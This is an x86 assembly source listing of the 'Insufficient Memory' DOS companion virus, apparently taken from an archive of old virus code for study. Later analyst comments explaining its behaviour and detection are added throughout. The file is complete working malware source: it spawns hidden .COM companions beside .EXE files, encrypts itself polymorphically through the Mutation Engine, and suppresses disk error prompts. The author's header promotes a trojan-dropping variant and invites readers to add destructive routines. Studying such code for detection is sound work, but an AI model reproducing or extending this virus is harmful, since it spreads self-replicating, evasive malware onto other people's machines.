
📄 insuff.asm

📁 More than 800 virus code (old school) just for fun and studying prehistoric viruses. WARNING: use
;INSUFFICIENT MEMORY virus - by URNST KOUCH for Crypt Newsletter #6
;INSUFF MEMO is a simple MUTATION ENGINE loaded spawning virus, which 
;confines itself to the current directory. To assemble with TASM 2.5, user
;must have complete MTE091B software package (including RND.OBJ,
;MTE.OBJ and stubfile, NOPS.BIN). Use MAKE2.BAT included in this
;issue of the Crypt Newsletter to assemble all proper
;components. Observant readers will notice INSUFF MEMO takes advantage of
;VCL 1.0 code as well as notation from the SARA virus.  INSUFF MEMO is
;a non-threatening, unique example of an MtE-loaded companion virus -
;the only one in circulation, in fact.
;
;INSUFF2, included as a DEBUG script in this newsletter, is functionally        
;identical to this virus.  However, for those who 'require' a destructive
;program for their full enjoyment, it is loaded with a routine which
;simply checks the system time and branches to some 'dropper' code if
;after quitting time (4:00 pm).  The 'dropper' reads from a data table
;and writes the NOIZ trojan to any .EXE in the current directory. By
;looking carefully at this code, several areas where 'potentially'
;destructive/nuisance routines can be added will suggest themselves.
;We do not include them for a number of reasons: 1) they are easy to
;come by in any number of books on assembly coding, the VCL 1.0 (an
;excellent source), or source code archives on many BBS's, and; 2)
;it allows you to get creative if you want and tinker (like I do all the
; time) with the basic layout of virus source.
;        
;INSUFF3's source listing is modified to allow the virus to jump out        
;of the current directory when all files in it are infected.  The
;listing is publicly available at the BBS's listed at the end of the
;Crypt newsletter.

	; Assembler setup for a tiny-model (.COM-style) image.
	; NOTE(review): .radix 16 makes every unsuffixed numeric literal in this
	; listing hexadecimal (org 100 = 100h, sub dx,10 = 10h, int 21 = 21h).
	.model  tiny
	.radix  16
	.code

	; Externals are not defined in this file; per the header they come from
	; the separately linked Mutation Engine objects (MTE.OBJ, RND.OBJ).
	extrn   mut_engine: near
	extrn   rnd_buf: word, data_top: near

	org     100

; Entry point: self-location stub.
; The call/pop pair yields the run-time offset of reladr; that offset is
; converted to paragraphs, reduced by 10h and added to DS to form a CS value,
; and control is transferred to begin with a far return.
; Analyst note: the body is written out through mut_engine (see infect), so
; the text below is presumably not visible in plaintext inside dropped
; files - confirm before relying on it as a signature.
start:
	call    locadr                  ; return address pushed = offset of reladr

reladr: 
	db      'Insufficient memory'   ; inert data; no code in this listing prints it
	
locadr:
	pop     dx                      ; DX = run-time offset of reladr
	mov     cl,4
	shr     dx,cl                   ; bytes -> 16-byte paragraphs
	sub     dx,10                   ; 10h paragraphs = 100h bytes (the org value)
	mov     cx,ds
	add     cx,dx                   ;Calculate new CS
	mov     dx,offset begin
	push    cx dx                   ; far pointer: computed CS, offset begin
	retf                            ; far return acts as a far jump to begin
; Run-time setup, then falls through into find_a_file.
;   1. DS := CS, DTA := dta_buf (INT 21h AH=1Ah).
;   2. Reads the INT 24h (critical error) vector with AX=3524h and replaces
;      it with fail_err via AX=2524h.
;   3. Zeroes rnd_buf, which the author's comment describes as the MtE seed.
;   4. Loads DX/CL/AH for a DOS find-first on the '*.EXE' mask.
; Analyst note: the values pushed at 'push es di', 'push es bx' and
; 'push cx' are never popped anywhere in this listing, so the previous
; INT 24h vector is not restored by this code.
begin:
	cld
	mov     di,offset start
	push    es di                   ;
	push    cs                      ;A carry over from the DAV
	pop     ds                      ;SARA virus, something of a curiosity
					;in this companion virus
	mov     dx,offset dta_buf       ;Set DTA
	mov     ah,1a
	int     21
	mov     ax,3524                 ;Hook INT 24, error handler
	int     21                      ;see bottom of code
	push    es bx                   ; old handler address ES:BX kept on the stack only
	mov     dx,offset fail_err
	mov     ax,2524
	int     21

	; CX = (value stored by PUSH SP) - SP, plus 4; the result is pushed
	; and not read again in this listing.
        xor     ax,ax                   ;Initialize random seed for MtE
	mov     [rnd_buf],ax            ;could be coded, mov  cs:[rnd_buf],0
	push    sp                      ;process necessary for generation of
	pop     cx                      ;MtE encryption key - see MtE docs
	sub     cx,sp                   ;for further notation
	add     cx,4
	push    cx
	; Find-first arguments: DS:DX = mask, CL = 3 (read-only + hidden bits
	; of the attribute mask), AH = 4Eh.
	mov     dx,offset srchnam   ;EXE file-mask for spawn-name search
	mov     cl,3
	mov     ah,4e               ; DOS find first file function
       
; Directory search loop. Entered with AH = 4Eh (find first) from begin, or
; AH = 4Fh (find next) from findr. Carry set by DOS means no (more) matches
; and the program terminates; otherwise control goes to infect.
; The 'jnc infection_done' below follows an unconditional jmp and is
; therefore never reached.
find_a_file:    
       int     021h
       jc      infection_done          ; Exit if no files found
       jmp     infect                  ; Infect the file!
       jnc     infection_done          ; Exit if no error
findr: mov     ah,04Fh                 ; DOS find next file function
       jmp     find_a_file             ; Try finding another file

	
; Common exit: terminate with return code 0 (INT 21h AX=4C00h).
; Analyst note: this listing contains no EXEC (INT 21h AH=4Bh) call, so the
; .EXE that shares the companion's base name is never launched from here;
; a program that silently does nothing when started is a behavioural symptom.
infection_done: 
     
	mov     ax,4C00h                ;terminate
	int     21h

; Companion-file creation for the .EXE name currently in the DTA.
;   1. Gets the DTA address (AH=2Fh) and copies the found file name
;      (DTA+1Eh) into spawn_name, length-prefixed.
;   2. Overwrites the extension of the name inside the DTA with "COM".
;   3. Tries to open that .COM read-only; if the open succeeds the file
;      already exists and the search continues at findr.
;   4. Otherwise creates the .COM, passes the body (start .. _DATA) to
;      mut_engine, writes the result and closes the handle.
;   5. Jumps unconditionally to infection_done, so at most one companion
;      file is created per run.
; Analyst notes (detection): look for a .COM that shares its base name
; with an .EXE in the same directory. Because the written image comes out
; of the Mutation Engine, its bytes are expected to differ from copy to
; copy, so a fixed byte signature of this body is not a reliable indicator.
infect:
	mov     ah,02Fh                 ; DOS get DTA address function
	int     021h
	mov     di,bx                   ; DI points to the DTA

	lea     si,[di + 01Eh]          ; SI points to file name
	mov     dx,si                   ; DX points to file name, too
	mov     di,offset spawn_name + 1; DI points to new name
	xor     ah,ah                   ; AH holds character count
transfer_loop:  
	lodsb                           ; Load a character
	or      al,al                   ; Is it a NULL?
	je      transfer_end            ; If so then leave the loop
	inc     ah                      ; Add one to the character count
	stosb                           ; Save the byte in the buffer
	jmp     short transfer_loop     ; Repeat the loop
transfer_end:   
	mov     byte ptr [spawn_name],ah; First byte holds char. count
	; NOTE(review): .radix 16 is in effect, so the unsuffixed 13 below is
	; presumably 13h rather than CR (0Dh) - confirm. spawn_name is not read
	; again anywhere in this listing.
	mov     byte ptr [di],13        ; Make CR the final character
	mov     di,dx                   ; DI points to file name
	xor     ch,ch                   ;
	mov     cl,ah                   ; CX holds length of filename
	mov     al,'.'                  ; AL holds char. to search for
repne   scasb                           ; Search for a dot in the name
	; The extension is rewritten in place inside the DTA copy of the name;
	; DX still points at the start of that name for the calls below.
	mov     word ptr [di],'OC'      ; Store "CO" as first two bytes
	mov     byte ptr [di + 2],'M'   ; Store "M" to make "COM"

	mov     byte ptr [set_carry],0  ; Assume we'll fail
	mov     ax,03D00h               ; DOS open file function, r/o
	int     021h
	jnc     findr                   ; File already exists, so leave
	mov     byte ptr [set_carry],1  ; Success -- the file is OK
	mov     ah,03Ch                 ; DOS create file function
	; NOTE(review): intended as binary 00100111 (27h = read-only + hidden +
	; system + archive); how TASM reads a trailing 'b' under .radix 16
	; should be confirmed. A hidden/system .COM beside an .EXE is a useful
	; triage indicator.
	mov     cx,00100111b            ; CX holds file attributes (all)
	int     21h
	xchg    bx,ax                   ; BX holds file handle
	push    dx cx                   ; not popped again in this listing
	; ES := CS + ((offset data_top + 0Fh) >> 4), i.e. the first paragraph
	; boundary at or after data_top.
	mov     ax,offset data_top+0Fh
	mov     cl,4
	shr     ax,cl
	mov     cx,cs
	add     ax,cx
	mov     es,ax
	mov     dx,offset start   ; DX points to start of virus
	mov     cx,offset _DATA   ; CX holds virus length for encryption 
	push    bp bx
	mov     bp,0100h  ;tells MtE decryption routine will
	xor     si,si     ;hand over control to where virus adds 
	xor     di,di     ;itself to 'infected' file, in this case offset  
	mov     bl,0Fh    ;0100h .. set si/di to 0, bl to 0Fh, all required 
	mov     ax,101    ;set bit-field in ax 
	call    mut_engine   ;call the Mutation Engine to do its thing
	; Register contents after the call are defined by the external engine,
	; not by this file. Assuming TASM's left-to-right multi-operand pop,
	; BX gets the file handle back and AX gets the saved BP value.
	pop     bx ax
	add     ax,cx
	neg     ax
	xor     ah,ah
	add     ax,cx
	mov     ah,040h          ;write encrypted virus to newly created file 
	int     21h
	mov     ah,03Eh          ;close the file 
	int     21h
	; The flags from this compare are not tested: the jump that follows is
	; unconditional.
	cmp     byte ptr [set_carry],1    
	jmp     infection_done            ;move to end game

		

; Replacement INT 24h (critical error) handler installed by begin.
; Returns AL = 3, the DOS "fail the call" response, so the usual
; Abort/Retry/Fail prompt does not appear when a write fails.
; Analyst note: a failed write to protected media with no prompt at all is
; a behavioural clue that INT 24h has been hooked.
fail_err:                      ;Critical error handler
	mov     al,3           ;prevents virus from producing
	iret                   ;messages on write-protected disks.
			       ;Not handed back to machine when virus exits.
; NUL-terminated search mask passed to find-first in begin.
srchnam db      '*.EXE',0      ;File-mask for 'spawn-search.'



	; Uninitialised working storage. begin points the DTA at dta_buf;
	; infect fills spawn_name and sets set_carry. In this listing
	; spawn_name is never read back and set_carry is only compared, with
	; no branch depending on the result.
	.data

dta_buf         db      2bh dup(?)              ; Buffer for DTA
spawn_name      db      12,12 dup (?),13        ; Name for next spawn
set_carry       db      ?                       ; Set-carry-on-exit flag
	
	end     start
